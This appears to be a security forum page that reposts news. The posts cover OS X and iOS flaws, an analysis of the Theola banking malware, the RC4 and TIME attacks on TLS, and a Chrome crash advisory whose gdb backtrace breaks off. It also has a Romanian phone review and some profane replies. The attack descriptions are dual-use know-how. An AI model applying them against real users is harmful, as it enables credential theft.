Nytro

[h=1]Apple Fixes OS X Flaw That Allowed Java Apps to Run With Plugin Disabled[/h]by Dennis Fisher March 15, 2013, 10:21AM Apple on Thursday released a large batch of security fixes for its OS X operating system, one of which patches a flaw that allowed Java Web Start applications to run even when users had Java disabled in the browser. OS X 10.8.3 fixes 21 total vulnerabilities, and also includes a new version of the malware removal tool for Apple machines. The latest set of patches for Apple OS X comprises a lot of important security patches, but the most interesting one is the fix for the Java issue. There have been a slew of serious vulnerabilities in Java disclosed in the last few months, and security experts have been recommending that users disable Java in their various browsers as a protection mechanism. However, it appears that measure wasn't quite enough to protect users of some versions of OS X. "Visiting a maliciously crafted website could allow a Java Web Start application to be launched automatically even if the Java plug-in is disabled. Java Web Start applications would run even if the Java plug-in was disabled. This issue was addressed by removing JNLP files from the CoreTypes safe file type list, so the Web Start application will not be run unless the user opens it in the Downloads directory," Apple said in its advisory. Many of the vulnerabilities in OS X that Apple fixed could be used for remote code execution. One of those is a buffer overflow in QuickTime that could allow an attacker to run arbitrary code on a vulnerable machine. Among the other fixes in the update is a change that revokes trust in some fraudulent SSL certificates issued months ago by TURKTRUST. "Several intermediate CA certificates were mistakenly issued by TURKTRUST. This may allow a man-in-the-middle attacker to redirect connections and intercept user credentials or other sensitive information. This issue was addressed by not allowing the incorrect SSL certificates," Apple said. Sursa: Apple Fixes OS X Flaw That Allowed Java Apps to Run With Plugin Disabled | threatpost

The Sandbox Roulette: Are you ready for the gamble? Rafal Wojtczuk rafal@bromium.com Rahul Kashyap rahul@bromium.com 26 February 2013 What is a sandbox? In computer security terminology, a sandbox is an environment designed to run untrusted (or potentially exploitable) code in a manner that prevents the encapsulated code from damaging the rest of the system. The reason to introduce a sandbox is the assumption that it is more feasible to isolate potentially malicious code than to build a large application that cannot be subverted by an attacker. Many different products can be categorized as sandboxes. For this talk, we focus on Windows-based application sandboxes. Such a sandbox is designed to run as a single application on top of a Windows OS. Usually, from the point of view of user experience, the existence of a sandbox container should be as unobtrusive as possible while still providing an additional layer of security. Short overviews of mechanisms used to implement a few selected sandboxes are presented later in this paper. Download: http://blogbromium.files.wordpress.com/2013/03/blackhat-2013-sandbox-roulette_wp.pdf

Da, inchizi procesul (Hostcon sau cum cacat apare) sin Task Manager.

[h=1]Samsung Galaxy S4, lansat - acelasi design, procesor mai puternic, ecran mai performant[/h]de Redactia Hit | 15 martie 2013 Samsung a lansat noul varg de gama al companiei, Samsung Galaxy S4, intr-un eveniment pe care l-ati putut urmari prin streaming Video chiar prin intermediul unei transmisiuni oficiale a companiei sud-coreene. Din pacate, noul Galaxy S4 nu aduce prea multe schimbari de design fata de modelul anterior, semn ca producatorul a mizat, cum de altfel anticipam in urma cu doar cateva zile, pe specificatii si functii. Desi ne-am fi dorit sa gresim cand am facut cateva predictii referitoare la noul model varf de gama Samsung, ei bine, nu ne-am inselat. Noul Galaxy S4 este aproape identic cu modelul Galaxy S3, iar acest lucru nu ne place deloc. Dar vom vorbi despre acest aspect ceva mai tarziu. Acum, sa trecem la specificatiile noului super-smartphone al sud-coreenilor. Samsung Galaxy S4 are un ecran de 5 inci (Super AMOLED), mai mare decat al Galaxy s3 (4,8 inci), dar si o rezolutie fullHD cu 441 ppi. Ecranul pare fantastic si poate fi comparat cu cel al HTC One. Samsung Galaxy S4 dispune, asa cum se estima, de configuratii hardware foarte performante. Spunem configuratii pentru ca Galaxy S4 va ajunge pe piata in doua versiuni, in functie de regiunea unde va fi lansat. Astfel, avem versiunea cu chipset Exynos octa-core cu procesor tactat la 1,6 GHz, dar si versiunea cu cu chipset Qualcomm quad-core (Snapdragon 600 sau 800 - Samsung nu a precizat ce alegere a facut), cu procesor tactat la 1,9 GHz. Ambele variante de Samsung Gaqlaxy S4 promit sa ofere performante remarcabile. Samsung Galaxy S4 are 2GB RAM, camera foto de 13MP (f/2.2) si autofocus si ofera gama completa de conectivitate. Dimensiunile smartphone-ului sunt de 136.6 x 69.8 x 7.9 mm. Terminalul ruleaza Android 4.2.2 Jelly Bean. Samsung nu a anuntat pretul smartphone-ului, dar ne asteptam la preturi similare celor la care a fost lansata generatia anterioara. Samsung Galaxy S4 va ajunge pe piata incepand cu luna aprilie, in 155 de tari, printre care si Romania. Despre functiile noului Galaxy S4 vom vorbi intr-un articol separat Asa cum spuneam mai devreme, faptul ca Samsung a ales sa nu schimbe designul noului Galaxy S4 fata de generatia anterioara este o greseala, desi, suntem convinsi ca sud-coreenii o vad ca pe o strategie. Din pacate Samsung incearca sa faca ceea a facut Apple cu designul iPhone, ani la rand, adica ...nimic. Da, ne-a placut Galaxy S3, in momentul lansarii, in ciuda unor critici venite tot pe parte de design. Acum, insa, solutia prea comoda aleasa de Samsung, respectiv transferul de design de la Galaxy S3 la S4 ni se pare o idee foarte proasta. Vom vedea, desigur cum va reactiona piata la lansarea noului smartphone de la Samsung si cum vor primi fanii companiei noul model de top. Sursa foto: GSMArena Sursa: Samsung Galaxy S4, lansat - acelasi design, procesor mai puternic, ecran mai performant | Hit.ro

In loc sa mute un cacat dintr-o parte in alta, ar trebui sa isi mai cumpere niste servere deoarece de ceva timp merge ca pula Feisbucu asta.

Cateva detalii?

[h=1]How Theola malware uses a Chrome plugin for banking fraud[/h]By Aleksandr Matrosov posted 13 Mar 2013 at 02:50PM Win32/Theola is one of the most malicious components of the notorious bootkit family, Win32/Mebroot.FX (known since 2007). The Theola family encompasses malicious browser plugins installed by Mebroot for banking fraud operations. We have been tracking an increase in detections of these plugins since the end of January 2013. The countries where Theola is most commonly detected are the Netherlands, Norway, Italy, Denmark and Czech Republic. ESET Virus Radar statistics show the regions most affected by Theola infection during the last week in the map below. Win32/Mebroot.FX uses typical MBR infection techniques, with a malicious int13 handler used for access to the hard drive components. Malicious components are loaded in the following order: In this blog post I’m concentrating on the analysis of malicious browser plugins and on answering the question of how money is stolen from a user’s infected machine. [h=3]Chrome plugin[/h] Win32/Theola.F is a Google Chrome plugin based on the NPAPI interface (Netscape Plugin Application Programming Interface). The malicious plugin has a native module and is packed by CRX format (CRX Package Format). The CRX container contains the following manifest file with the permissions shown: The most interesting string in the manifest is “permissions”, describing the activity allowed for this plugin. This set of permissions is enough to allow fraudulent, malicious operations. Win32/Theola loads in the Google Chrome browser like this: After deobfuscation the first JavaScript method loads the native module as default-plugin for Google Chrome: This JavaScript module modifies the POST tracking method for all web forms on the loaded web page. And by making password input fields visible this method makes (for the attacker) a useful combination with the embedded video recording functionality described below. The plugin loaded in the browser extensions panel looks like this: The routine NP_GetEntryPoints() calls the plugin load process and gets the pointers to other functions needed for working with the plugin within the browser. The decompiled code of NP_GetEntryPoints() is presented here, with the Theola plugin interface: The image directly below shows the the reconstructed virtual method table (vtable) as seen in Win32/Theola’s main functionality. Theola has video recording functionality based on the open source x264 library for recording video in MPEG format. When the plugin has already started up the function addListners() loads the JavaScript code for tracking web activity on the infected machine. The JavaScript code for manipulating URLs is presented here: The method beforeNavigate() in the native module is presented here: If activity is detected on the banking web page, then Win32/Theola sends all sensitive information (passwords, credit card numbers and etc) to the special named pipe. The name of the pipe is generated by the following algorithm: All communications with the kernel-mode module and other user-mode modules are implemented with special named pipe handlers in the plugin. Each handler is responsible for the execution of specified type of events in the execution process. [h=3]Conclusion[/h] Google Chrome is one of the most popular browsers in the world and its popularity among malware developers is also growing. Win32/Theola provides its malicious module as a Chrome plugin: this is more difficult to detect because the plugin uses only documented API methods for controlling web activity. This documented API is adequate for manipulating sensitive data submitted into web forms. Much banking malware uses user-mode hooks for intercepting network activity, but Win32/Theola uses documented and legitimate methods just as effectively and by doing so is better able to bypass detection by security software. Special thanks to my colleague Anton Cherepanov Aleksandr Matrosov, Security Intelligence Team Lead SHA1 hashes for analyzed samples: Win32/Theola.F (CRX plugin): 0a74c1897a8a3a56cbc4bd433e100e63f448c136 Win32/Theola.D (dll module): 5591d013f38f64f2695366ff4cb4727c94a266e9 Sursa: How Theola malware uses a Chrome plugin for banking fraud - We Live Security

[h=3]Critical iOS vulnerability in Configuration Profiles pose malware threat[/h]Posted by: Mohit Kumar onThursday, March 14, 2013 a vulnerability that could allow hackers to control and spy on iPhones. A major security vulnerability for iOS configuration profiles pose malware threat. The vulnerability affects a file known as mobileconf files, which are used by cell phone carriers to configure system-level settings. These can include Wi-Fi, VPN, email, and APN settings. Apple used to use them to deliver patches, and carriers sometimes use them to distribute updates. Adi Sharabani, CEO and co-founder of Skycure, made a demonstration that how sensitive information, including the victim’s exact location, could be retrieved, while also controlling the user’s iPhone. In Demo, he setup a fake website with a prompt to install a configuration profile and sent the link out to Victim. After installing it, he found out they were able to pull passwords and other data without his knowledge. These malicious profiles can be emailed or downloaded from Web pages and after being installed, and attacker able to change a large number of iPhone settings. If used maliciously, these profiles can be very dangerous. Even though their use is approved by Apple, they aren't subject to the standard sandboxing rules that apply to third party App Store apps and websites. Other than an attack on privacy, this could lead to more dangerous consequences as an example, it is quite easy to change a GPS destination while driving and send the smartphone owner to a location the attacker chooses. Sursa: Critical iOS vulnerability in Configuration Profiles pose malware threat - Hacking News

[h=1]Two new attacks on SSL decrypt authentication cookies[/h][h=2]Aging standard isn't holding up very well in face of sophisticated attacks.[/h] by Dan Goodin - Mar 14 2013, 6:05pm GTBST Werwin15 Researchers have devised two new attacks on the Transport Layer Security and Secure Sockets Layer protocols, the widely used encryption schemes used to secure e-commerce transactions and other sensitive traffic on the Internet. The pair of exploits—one presented at the just-convened 20th International Workshop on Fast Software Encryption and the other scheduled to be unveiled on Thursday at the Black Hat security conference in Amsterdam—don't pose an immediate threat to the millions of people who rely on the Web-encryption standards. Still, they're part of a growing constellation of attacks with names including BEAST, CRIME, and Lucky 13 that allow determined hackers to silently decrypt protected browser cookies used to log in to websites. Together, they underscore the fragility of the aging standards as they face an arsenal of increasingly sophisticated exploits. "It illustrates how serious this is that there are so many attacks going on involving a protocol that's been around for years and that's so widely trusted and used," Matthew Green, a professor specializing in cryptography at Johns Hopkins University, told Ars. "The fact that you now have CRIME, BEAST, Lucky 13, and these new two attacks within the same week really illustrates what a problem we're facing." The most serious of this week's attacks exploits weaknesses in RC4, a stream cipher that researchers estimate is used to encrypt about 50 percent of the world's TLS traffic. Cryptographers have long known of flaws in RC4. Specifically, some of the pseudo-random bytes the cipher used to encode messages were predictable. But until now scientists hadn't devised a practical way to exploit the shortcoming. A team from Royal Holloway, University of London, and the University of Illinois-Chicago has discovered that the small "biases" contained in RC4 can be manipulated in a way that reveals a limited amount of the plaintext in an encrypted data stream. It requires attackers to receive tens of millions of different encryptions of the same message. By statistically sampling them, the lack of randomness can be exploited to deduce parts of the encrypted message. "Some of us have been worried for quite a while that RC4 was becoming the dominant cipher of choice in TLS," Royal Holloway scientist Kenneth G. Paterson told Ars. "We knew that RC4 had significant problems. What we didn't know was how to exploit them in TLS. Now we do. Vendors and users are on notice: this attack is only going to get stronger." Because only small parts of message can be decrypted, the attack works best against ciphertext that contains known strings in a fixed location, such as authentication cookies. "Unfortunately, if your connection is encrypted using RC4 (as is the case with Gmail), then each time you make a fresh connection to the Gmail site, you're sending a new encrypted copy of the same cookie," Green wrote in a blog post describing the attack. "If the session is renegotiated (i.e., uses a different key) between those connections, then the attacker can build up the list of ciphertexts he needs." The number of TLS key renegotiations in the typical Web session is vastly insufficient to satisfy the tens of millions of encryptions attackers need. The scientists—who include Nadhem AlFardan, Dan Bernstein, Kenny Paterson, Bertram Poettering, and Jacob Schuldt—have therefore proposed that JavaScript working with a man-in-the-middle attacker can rapidly generate all the encrypted connections needed for the attack. A man-in-the-middle position is when the attacker has a connection between the two parties and the ability to monitor or even tamper with the messages sent back and forth. [h=2]It’s about TIME[/h] This week's other TLS attack is also able to read HTTPS-protected login credentials when end users transmit them to Web servers. The so-called TIME exploit—short for Timing Info-leak Made Easy—is in some respects a refinement of the CRIME attack that successfully decrypted HTTPS-protected browser cookies used to access user accounts on Github.com, Dropbox.com, and Stripe.com. That earlier exploit worked when both the targeted website and browser used the Google-spawned SPDY protocol or TLS compression to reduce the number of bytes contained in a file or data stream by removing redundant information. By guessing the contents of an encrypted payload character by character and then analyzing whether the compressed ciphertext grew or shrank in size, researchers Juliano Rizzo and Thai Duong were able to slowly decipher the contents. TIME works in a similar fashion. It uses JavaScript that forces a browser to send multiple requests to an online bank or other website that uses TLS. But rather than measure the number of bytes contained in the encrypted request sent by the end user, TIME measures the time it takes for websites to respond with responses that have been both encrypted and compressed. Responses that are faster will on average contain fewer bytes, allowing attackers to know that the plaintext contained in a particular guess was also contained in the encrypted data stream. By forcing a victim browser to send hundreds or thousands of requests and comparing subtle differences in the time it takes for the website to respond, the TIME attack decrypts the payload character by character until all of the contents are revealed. "The attacker no longer needs to be an eavesdropper," Tal Be'ery, Web security research team leader at security firm Imperva, said of the TIME attack he helped develop. "The attacker can just lead the victim to his site and from that point onward the attacker only needs to apply certain JavaScript to get the victim's secret data." Most of the previous exploits on TLS require the attacker to have a "man-in-the-middle" position. When combined with the CRIME techniques, TIME has no such restrictions. It's also potentially more effective than either the Lucky 13 or the other attack from this week because it requires hundreds of thousands of requests, rather than tens of millions or hundreds of millions. Be'ery said the vulnerability TIME exploits resides more in browsers than in TLS itself. Specifically, the problem lies in a bedrock security principle known as the same origin policy. It prevents cookies and most other content set by one domain from being able to read or modify data from another domain. The researcher said the policy should be extended to prevent timing attacks. "Just as the browser doesn't let JavaScript directly get the size of the request or the response to other sites... it should stop the timing information from leaking, because it enables the attacker to infer on the secret information," he told Ars. "It shouldn't be allowed to do so. Browsers need to have some mechanism for the server to say 'I don't want to give any information about this specific resource. I don't want to let it be timed.'" [h=2]Not enough Band-Aids[/h] Given the hurdle of collecting vast numbers of encrypted packets, it's unlikely either of this week's attacks—or last month's Lucky 13 exploit, for that matter—will have much practical application right away. But as new techniques are developed and new vulnerabilities are discovered, the attacks are likely to improve and may at some point overcome the resistance TLS has so far shown in withstanding the string of new exploits. Ironically, a chief reason for the large concentration of RC4-protected TLS traffic was its ability to withstand BEAST attacks. Now that both Lucky 13 and one of this week's attacks target the cipher, security engineers are running out of Band-Aids with which to harden TLS. So far, website operators and browser developers have been hesitant to replace vulnerable versions of TLS with newer versions out of fear that the changes will disrupt millions of connections. "It's not totally clear what can be done," Green told Ars, referring to a reliable fix for the Web encryption standards. "In the short term, we have better versions of TLS and we're not using them for a bunch of silly reasons, mostly to do with backward compatibility. Browser companies and people who make servers really need to get on this and they need to start moving to new versions and TLS. They need to do it soon, before these attack become really practical." Sursa: Two new attacks on SSL decrypt authentication cookies | Ars Technica

Blackhat 2010 - Attacking Phone Privacy Description: Our most popular phone technologies use decade-old proprietary cryptography. GSM's 64bit A5/1 cipher, for instance, is vulnerable to time memory trade-offs but commercial cracking hardware costs hundreds of thousands of dollars. We discuss how cryptographic improvements and the power of the community created an open GSM decrypt solution that runs on commodity hardware. Besides GSM we discuss weaknesses in DECT cordless phones. The talk concludes with an overview of mitigation steps for GSM and DECT in response to our research, some of which are already being implemented. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Blackhat 2010 - Attacking Phone Privacy

Google Chrome 21.0.1180.57 NULL Pointer Authored by Heyder Andrade Google Chrome versions 21.0.1180.57 and below suffer from a NULL pointer vulnerability in InspectDataSource::StartDataRequest. ---| overview Vulnerability: Chrome Null Pointer in InspectDataSource::StartDataRequest Date: 03/14/2012 Author: @HeyderAndrade (heyder.andrade[at]gmail[dot]com) Chrome Version: =< 21.0.1180.57 stable Operating System Tested: Win XP SP2, WIN7, Mac OS X 10.6.8 (10K549),Linux Ubuntu 12.04 Architecture: x86 and Amd64 ---| steps will reproduce this crash 1. Open the browser and visit any site that has an SSL certificate signed by a CA not trusted. an ssl error will be showed, DON'T click "proceed anayway". 2. Open a new tab and access chrome://inspect ps. I believe it should work with any ssl error, but i tested only with no valid CA error. ---| original OSX Crash Report Process: Google Chrome [767] Path: /Applications/Google Chrome.app/Contents/MacOS/Google Chrome Identifier: com.google.Chrome Version: 21.0.1180.57 (1180.57) Code Type: X86 (Native) Parent Process: launchd [158] Date/Time: 2012-08-08 22:53:09.442 -0300 OS Version: Mac OS X 10.6.8 (10K549) Report Version: 6 Interval Since Last Report: 19713 sec Crashes Since Last Report: 1 Per-App Interval Since Last Report: 19374 sec Per-App Crashes Since Last Report: 1 Anonymous UUID: B5BA5F00-E166-4923-9393-E0FC63561975 Exception Type: EXC_BAD_ACCESS (SIGBUS) Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000000 Crashed Thread: 0 CrBrowserMain Dispatch queue: com.apple.main-thread ---| source code This vulnerability lies in the function call DCHECK (line 118 of the inspect_ui.cc) the render_process_host can be NULL. file: browser/ui/webui/inspect_ui.cc line: 188 function: DCHECK(render_process_host); ---| source code fix if (!render_process_host->HasConnection()) continue; ---| timeline of disclosure - discovery vulnerability - Ago 08, 2012 - code.google.com report - Aug 15, 2012 - Chromium community fix - Oct 11, 2012 - This disclosure - Mar 14, 2013 ---| references https://chromiumcodereview.appspot.com/11066114/ (for some reason this issue was removed) https://code.google.com/p/chromium/issues/detail?id=142979 (no public) Starting program: /home/user/chrome-linux/chrome --debug https://caixa.gov.br [Thread debugging using libthread_db enabled] [New Thread 0xb2735b70 (LWP 10475)] [New Thread 0xb1f34b70 (LWP 10476)] [New Thread 0xb1733b70 (LWP 10477)] [New Thread 0xb280db70 (LWP 10478)] [New Thread 0xb0666b70 (LWP 10479)] [New Thread 0xafe65b70 (LWP 10480)] [New Thread 0xaf664b70 (LWP 10481)] [New Thread 0xaee63b70 (LWP 10482)] [New Thread 0xae662b70 (LWP 10483)] [New Thread 0xade61b70 (LWP 10484)] [New Thread 0xad660b70 (LWP 10485)] [New Thread 0xace5fb70 (LWP 10486)] [New Thread 0xace3eb70 (LWP 10487)] [New Thread 0xace1db70 (LWP 10488)] [New Thread 0xacdfcb70 (LWP 10489)] [New Thread 0xac4eeb70 (LWP 10490)] [Thread 0xac4eeb70 (LWP 10490) exited] [New Thread 0xac4eeb70 (LWP 10491)] [New Thread 0xab0fbb70 (LWP 10492)] [New Thread 0xaa8fab70 (LWP 10497)] [New Thread 0xaa0f9b70 (LWP 10498)] [New Thread 0xa9282b70 (LWP 10515)] [Thread 0xa9282b70 (LWP 10515) exited] [New Thread 0xa97abb70 (LWP 10516)] [New Thread 0xa978ab70 (LWP 10519)] [New Thread 0xa9769b70 (LWP 10520)] Program received signal SIGSEGV, Segmentation fault. 0xb40ea92b in (anonymous namespace)::InspectDataSource::StartDataRequest(std::string const&, bool, int) () #0 0xb40ea92b in (anonymous namespace)::InspectDataSource::StartDataRequest(std::string const&, bool, int) () #1 0xb40caf9b in base::internal::Invoker<4, base::internal::BindState<base::internal::RunnableAdapter<void (ChromeURLDataManager::DataSource:)(std::string const&, bool, int)>, void ()(ChromeURLDataManager::DataSource*, std::string const&, bool, int), void ()(ChromeURLDataManager::DataSource*, std::string, bool, int)>, void ()(ChromeURLDataManager::DataSource*, std::string const&, bool, int)>::Run(base::internal::BindStateBase*) () #2 0xb498c220 in MessageLoop::RunTask(base::PendingTask const&) () #3 0xb498c8c2 in MessageLoop::DeferOrRunPendingTask(base::PendingTask const&) () #4 0xb498cc31 in MessageLoop::DoWork() () #5 0xb49d58be in base::MessagePumpGlib::RunWithDispatcher(base::MessagePump::Delegate*, base::MessagePumpDispatcher*) () #6 0xb49d543c in base::MessagePumpGlib::Run(base::MessagePump::Delegate*) () #7 0xb498846e in MessageLoop::RunInternal() () #8 0xb49a4ae9 in base::RunLoop::Run() () #9 0xb46513f5 in ChromeBrowserMainParts::MainMessageLoopRun(int*) () #10 0xb65262ec in content::BrowserMainLoop::RunMainMessageLoopParts() () #11 0xb6527280 in (anonymous namespace)::BrowserMainRunnerImpl::Run() () #12 0xb65247f3 in BrowserMain(content::MainFunctionParams const&) () #13 0xb48fb758 in content::RunNamedProcessTypeMain(std::string const&, content::MainFunctionParams const&, content::ContentMainDelegate*) () #14 0xb48fb8b0 in content::ContentMainRunnerImpl::Run() () #15 0xb48fa797 in content::ContentMain(int, char const**, content::ContentMainDelegate*) () #16 0xb3fbe60b in ChromeMain () #17 0xb3fbe5c2 in main () Thread 25 (Thread 0xa9769b70 (LWP 10520)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 24 (Thread 0xa978ab70 (LWP 10519)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 23 (Thread 0xa97abb70 (LWP 10516)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 21 (Thread 0xaa0f9b70 (LWP 10498)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49be489 in base::SequencedWorkerPool::Inner::ThreadLoop(base::SequencedWorkerPool::Worker*) () #4 0xb49bec19 in base::SequencedWorkerPool::Worker::Run() () #5 0xb49bf733 in base::SimpleThread::ThreadMain() () #6 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #7 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #8 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 20 (Thread 0xaa8fab70 (LWP 10497)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365342 in pthread_cond_timedwait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b24cc in base::ConditionVariable::TimedWait(base::TimeDelta const&) () #3 0xb49b36dd in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb498e11a in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #5 0xb498846e in MessageLoop::RunInternal() () #6 0xb49a4ae9 in base::RunLoop::Run() () #7 0xb498775e in MessageLoop::Run() () #8 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #9 0xb49bfa91 in base::Thread::ThreadMain() () #10 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #11 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #12 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 19 (Thread 0xab0fbb70 (LWP 10492)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49be489 in base::SequencedWorkerPool::Inner::ThreadLoop(base::SequencedWorkerPool::Worker*) () #4 0xb49bec19 in base::SequencedWorkerPool::Worker::Run() () #5 0xb49bf733 in base::SimpleThread::ThreadMain() () #6 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #7 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #8 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 18 (Thread 0xac4eeb70 (LWP 10491)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb49bfa91 in base::Thread::ThreadMain() () #11 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #12 